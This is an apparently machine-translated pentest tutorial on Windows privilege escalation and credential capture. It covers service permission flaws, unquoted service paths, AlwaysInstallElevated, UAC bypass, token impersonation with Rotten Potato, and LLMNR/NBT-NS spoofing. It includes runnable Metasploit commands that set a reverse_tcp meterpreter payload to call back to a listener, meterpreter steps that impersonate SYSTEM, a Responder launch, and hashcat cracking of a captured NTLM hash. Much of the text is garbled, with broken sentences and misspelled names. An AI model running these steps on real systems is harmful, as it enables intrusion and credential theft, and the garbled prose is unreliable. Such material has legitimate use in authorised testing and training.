1. Kernel overflow vulnerability Authorization

utilize Metasploit Missing patch found

2.Windows Operating system configuration error utilization analysis and prevention

System service permission configuration error

Windows System service files are loaded and executed when the operating system starts , And call the executable file in the background . therefore , If a low privilege user has write access to the executable file of such system service call , You can replace the file with any executable file , And with the start of the system services to obtain system permissions .Windows Service is based on System Permission to run , therefore , Its folder 、 Files and registry keys are protected by strong access control mechanisms . however , In some cases , There are still some unprotected services in the operating system .

System service permission configuration error ( Writable directory vulnerability ） There are two possibilities .

• The service is not running : The attacker will replace the original service with an arbitrary service , Then restart the service .
• The service is running and cannot be terminated : This is in line with the vast majority of exploit scenarios , Attackers usually take advantage of DLL Hijack the technology and try to restart the service to raise the power .

Metasploit The actual combat use of

stay Metasploit in , The corresponding utilization module is service _permissions. choice “AGGRESSIVE” Options , You can take advantage of every defective service on the target machine . When this option is disabled , The module will stop working after the first successful right raising

perform “run” command , Will automatically bounce a new meterpreter ( System jurisdiction )

service_permissions The module uses two methods to obtain System jurisdiction : If meterpreter Run with administrator privileges , The module will try to create and run a new service ; If the current permission does not allow the creation of services , The module will judge which service files or folders have permissions problems , And allow it to be hijacked . When creating a service or hijacking an existing service , This module creates an executable program , The file name and installation path are random .

Registry key AlwaysInstallElevated

Registry key AlwaylanalElvated Is a policy setting item .Windows Allow low privilege users to System Permission to run the installation file . If this policy setting item is enabled , Then users with any permission can NT AUTHORITY\SYSTEM Permission to install malicious MSI file .

You can use Metasploit Of exploiexploit/windows/local/always_install_elevated The module completes the above operations . Use this module and set session parameters , Input “run” command , Will return a System The powers of the meterpreter. The module creates a file with a random name MSI file , And delete all deployed files after authorization is raised .
Just disable the registry key AlwaysInstallElevated, You can prevent an attacker from passing MSI Right to file .

Trusted service path vulnerability

Trusted service path ( Path with spaces and no quotes ) The loophole exploited Windows The feature of file path resolution and involves the file of service path / Folder permissions ( The defective service program makes use of a file that is an executable / Folder permissions ). If - Suit Executable of service call The file does not properly handle the referenced full pathname , This vulnerability can be used by attackers to upload arbitrary executable files . in other words , If a service The path to the executable of is not enclosed in double quotes and contains spaces , Then there are loopholes in this service .

There are two possibilities for this vulnerability

•     If the path is service related , Just create any service or compile Sericce Templates .
•     If the path is related to the executable , Just create any executable file

Trusted Service Paths The cause of the leak

because windows Service is usually based on System Permission to run , Therefore, when the system parses the spaces in the file path corresponding to the service , It will also be performed with system permissions .
for example , There is a file path "C:\Program Files\ Some Folder\Service.exe", For each space in the path ,Windows Will try to find and execute a program that matches the name in front of the space . The operating system will try all possible cases of spaces in the path , Until you find a matching program .
In this case ,Windows Will try to make sure in turn

    C:\Program.exe
    C:\Program Files\ Some.exe
    C:\Program Files\ Some Folder\Service.exe

therefore , If one is “ appropriate ” The named executable is uploaded to the affected directory , Once the service is restarted , The program will start with Syten Permission to run ( in the majority of cases )

Metasploit The actual combat use of

Use msf Medium WINDOWS Service Trusted Path Privilege Escalation The module is subjected to a penetration test . The module places the executable program in the affected folder , Then we will talk about the restart of the affected services

msf6 > use exploit/windows/local/unquoted_service_path
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/unquoted_service_path) > set SESSION 5
SESSION => 5
msf6 exploit(windows/local/unquoted_service_path) > set LHOST 1.1.1.5
LHOST => 1.1.1.5
msf6 exploit(windows/local/unquoted_service_path) > run    # After the execution of the command , Bounce a meterpreter, But the rebound will end quickly , The process needs to be migrated 

After the execution of the command , Will automatically bounce a new meterpreter. Query the permission again , It shows that the right is raised successfully , It should be noted that , Rebounding meterpreter It will be interrupted soon , This is because when a process is Windows After startup in the operating system , You must communicate with the service control manager , If there is no communication , The service control manager thinks an error has occurred , And then terminate the process . In the penetration test , You need to migrate the payload process to another process before terminating it ( have access to “set AutoRunScript migrate -f” Command to automatically migrate processes ).

Automatically install configuration files

When the network administrator configures the same environment for multiple machines in the intranet , It's not usually configured one by one , We will use the method of scripted batch deployment . In the process , Will use the installation configuration file . These files contain all the installation configuration information , Some of them may also contain information such as local administrator account and password . These documents are listed below ( The whole system can be checked ）

• C:\sysprep.inf
• C:\sysprep\sysprep.xml

Metasploit Integrated exploitation module of this vulnerability post/windows/gather/enum_unattend

Planning tasks

AccessChk yes SysInterals One of the tools in the suite , from Mark Russinovich To write , Used in Windows Advanced query of some systems or programs in 、 Management and troubleshooting , See... For download address [ link 4-6]. Detection based on anti-virus software, etc , The attacker will try to avoid touching the disk of the target machine . and AccessChk It is an official tool provided by Microsoft , Generally, it will not cause the alarm of anti-virus software , So it is often used by attackers .
Execute the following command , View the permission configuration of the specified directory . If the attacker has write access to the directory where the task running with high privileges is located , You can overwrite the original program with a malicious program . such , When the next scheduled task is executed , Will run malicious programs with high privileges .

Analysis and prevention of group policy preferences

SYSVOL It's a shared folder in the active directory for storing copies of domain public file servers , Replication between all domain controllers in the domain .SYSVOL The folder is automatically created when the active directory is installed , It is mainly used to store login scripts 、 Group policy data and other domain information needed by the domain controller .SYSVOL Share within the domain of all authenticated domain users or domain trusted users who have read access to the active directory . Whole SYsVOL Directories are automatically synchronized and shared across all domain controllers , All domain policies are stored in C:Windows\SYSVOL\DOMAIN\Policicsl Directory .

In the general extraterritorial situation , All hosts are scripted and deployed in batches , The amount of data is usually large . In order to conveniently access all the machines IP, Shanghai Hubi Industrial Co., Ltd. uses domain policy for unified configuration and management . After most organizations create a domain environment , Will require the computer to join the domain to use the domain user password for login verification . To ensure the security of the local administrator password , Network administrators in these organizations change local administrator passwords . For all that , Security issues remain . Unified password modification through group policy , Although the intensity has increased , But the local administrator password is the same for all machines . The attacker obtained the local administrator password of a machine , It is equivalent to getting the local administrator password of all machines in the whole domain .

Common group policy preferences （Group Policy Preferences,GPP) List the following

•     Mapping drives （Drives.xml ).
•     Create local users .
•     data source （DataSources.xml )
•     Printer configuration (Printers.xml )
•     establish / Update service (（Services.xml )
•     Planning tasks （ScheduledTasks.xml )
   

Bypass UAC Right raising analysis and prevention

If the operating system version of the computer is Windows Vista Or higher , In case of insufficient authority , Access the root directory of the system disk （ for example C:) Windows Catalog 、Program Files Catalog , And reading 、 Write system login database (Registry) Procedures, etc , All need to be discussed UAC (User Account Control, User account control ） The certification can only be carried out .

UAC brief introduction

UAC It is Microsoft's effort to improve system security Windows Vista Technology introduced in .UAC Require users to perform operations that may affect the operation of the computer or before making settings that may affect other users , Have corresponding permissions or administrator password .UAC Authenticate the user before the operation starts , To avoid unauthorized installation of ideological software and spyware on the computer or change of computer settings . stay Windows Vista And later operating systems , Microsoft has set up a security control strategy , Divided into high 、 in 、 Three lower levels . High level processes have administrator privileges , Medium level processes have ordinary user permissions ; Low level processes , Permission is limited , To ensure that the system is minimally damaged by security threats .

need UAC The operations that can only be performed with the authorization of are listed below

•     To configure Windows Update.
•     increase / Delete account .
•     Change account type .
•     change UAC Set up .
•     install ActiveX.
•     install / Imperial loading procedure .
•     Install device drivers .
•     Move files / Copied to the Program Files or Windows Under the table of contents .
•     View other users' folders .

UAC There are four setting requirements as follows .

1.     Always notify : This is the most stringent setting , Whenever a program needs to use high-level permissions, it will prompt the local user .
2.     Only notify me when the program attempts to change my computer : This is a UAC Default Settings . When the local Windows When a program wants to use high-level permissions , Users will not be notified . however , When a third-party program wants to use high-level permissions , Local users will be prompted .
3.     Only notify me when the program attempts to change my computer （ Don't reduce the brightness of the desktop ): Same as the previous setting , But don't lower the brightness of the desktop when you prompt the user .
4. Never prompt ： When the user is a system administrator , All programs will run with the highest privileges

bypassuac modular

It is assumed that through a series of early penetration tests , The target machine has been obtained meterpreter Shell. The current permissions are ordinary user permissions , Now try to get the... Of the system System jurisdiction .
First , function exploit/windows/localbypassuac modular , Get a new meterpreter Shell, Pictured 4-48 Shown . then , perform “getsystem” command . View permissions again , Found to have bypassed UAC, To obtain the System jurisdiction , Pictured 4-49 Shown .
In the use of bypassuac When the module carries out authorization , The current user must be in the administrators group , And UAC Must be the default setting ( namely “ Only notify me when the program attempts to change my computer ”).
When bypassuac Module runtime , Multiple files will be created on the target machine , These files will be recognized by anti-virus software . But because exploit/windows/local/bypassuac_injection Modules run directly in memory reflection DLL in , So it doesn't touch the hard disk of the target machine , So as to reduce the probability of being detected by anti-virus software .
Metasploit The framework does not provide for Windows 8 Penetration test module .

  defense

1. In the enterprise network environment , Prevent bypass UAC The best way is not to allow users of Intranet machines to have local administrator privileges , So as to reduce the possibility of system attack .
2. In the home network environment , It is recommended to use non administrator permissions for daily office and entertainment activities . Users logged in with local administrator privileges , To put UAC Set to “ Always notify ” Or delete the user's local administrator rights ( After this setting , It'll be like Windows Vista In the same , Always pop up warnings ).
3. in addition , You can use Microsoft's EMET or MalwareBytes To better prevent 0day Loophole .
    

Token stealing analysis and prevention

Fake user token

Suppose you have obtained the target machine's meterpreter Shell. First type “use incognito” command , Then input "list_tokens -u” command , List available tokens , Pictured 4-60 Shown .

Next , stay incognito Call in impersonate_token, counterfeit Administrator The user performs penetration testing . stay meterpreter Shell In the implementation of “shell” Command and type “whoami”, Fake token win-57tj4b561mtladministrator You have obtained the permission of system administrator , Pictured 4-61 Shown .

Rotten Potato Analysis of local rights raising

The key point of raising rights through rotten potatoes is to simulate tokens , In the process of raising rights , We'd better have got one with SeImpersonate Or other accounts with the same authority , Usually Windows Many services in have this permission （IIS and SQL Server etc. ）

If a valid token exists in the target system , Can pass Rotten Potato The program quickly simulates the user token to promote the authority . First type “use incognito” command , Then input “list_tokens -u” command , List available tokens

When the download is complete ,RottenPotato There will be a rottenpotato.exe Executable file . Execute the following command , take rottenpotatocxe Upload to the rijibiao machine

meterpreter > upload /home/kali/Downloads/rottenpotato.exe
meterpreter > use incognito 
meterpreter > list_tokens -u        # List tokens 
meterpreter > execute -HC -f rottenpotato.exe 
meterpreter > impersonate_token "NT AUTHORITY\SYSTEM"

  Defense measures for token theft and authorization are as follows

• Install the patch pushed by Microsoft in time .
• For unknown or dangerous software , Do not use... In the system , And don't use... In virtual machines .
• Limit the timeliness of tokens , To prevent the hash value from revealing valid token information after being cracked . The more sensitive the data , The token age should be shorter . If each operation uses a separate token , It is easy to locate the operation or link of the leaking token .
• For tokens , Encrypted storage and multiple authentication protection shall be adopted .
• Using encrypted Links SSL/TLS Transmit token , To prevent eavesdropping by middlemen .
   

Analysis and prevention of access without credentials

LLMNR and NetBIOS Spoofing attack analysis

Suppose that the target network DNS When the server is unable to provide service due to failure , Will return LLMNR and NBT-NS Perform computer name resolution . Use Responder Tools for penetration testing .
Responder It's listening. LLMNR and NBT-NS One of the tools of the protocol , Be able to grab all the in the network LLMNR and NBT-NS Request and respond , Get the initial account voucher .
Responder You can use the built-in SMB Authentication server 、MSSQL Authentication server 、HTTP Authentication server 、HTTPS Authentication server 、LDAP Authentication server 、DNS The server 、WPAD proxy server , as well as FTP、POP3、IMAP、SMTP Wait for the server , Collect credentials for computers in the target network , You can also use Multi-Relay Function to execute commands in the target system .
Download and run
Responder It's using Python language-written .

git clone https://github.com/SpiderLabs/Responder.git
┌──(rootkali)-[/home/kali]
└─# responder -I eth0

  Penetration test

In the use of Responder After analyzing the network, you can use SMB The protocol obtains the information about computers in the target network Net-NTLM Hash. If the user enters the wrong computer name in DNS The name query operation on the server will fail , The name resolution request will be returned , Use NBT-NS and LLMNR To analyze .

In the penetration test , Use Responder Enable the response request function ,Responuer It will automatically respond to the client's request and declare that it is the machine with the wrong computer name , Ran Shi tries to build SMB Connect . The client item sends its own Nt-NTeLM Hash Authentication , At this point, you will get the... Of the target machine Net-NTLM Hash

  Use hashcat To crack

hashcat -m 5600 q::WIN7:524fa9048b91226c:A78B9944E2BCB793E02A78511A370527:01010000000000009AA13A40DDD9D60164D36B5FEDF5E086000000000200060053004D0042000100160053004D0042002D0054004F004F004C004B00490054000400120073006D0062002E006C006F00630061006C000300280073006500720076006500720032003000300033002E0073006D0062002E006C006F00630061006C000500120073006D0062002E006C006F00630061006C000800300030000000000000000100000000200000EBE62023381C3BC8F579B7C0DC4B836449D20887CC0365A21217FB41FBB0F3040A001000000000000000000000000000000000000900180048005400540050002F0031002E0031002E0031002E0035000000000000000000 p.txt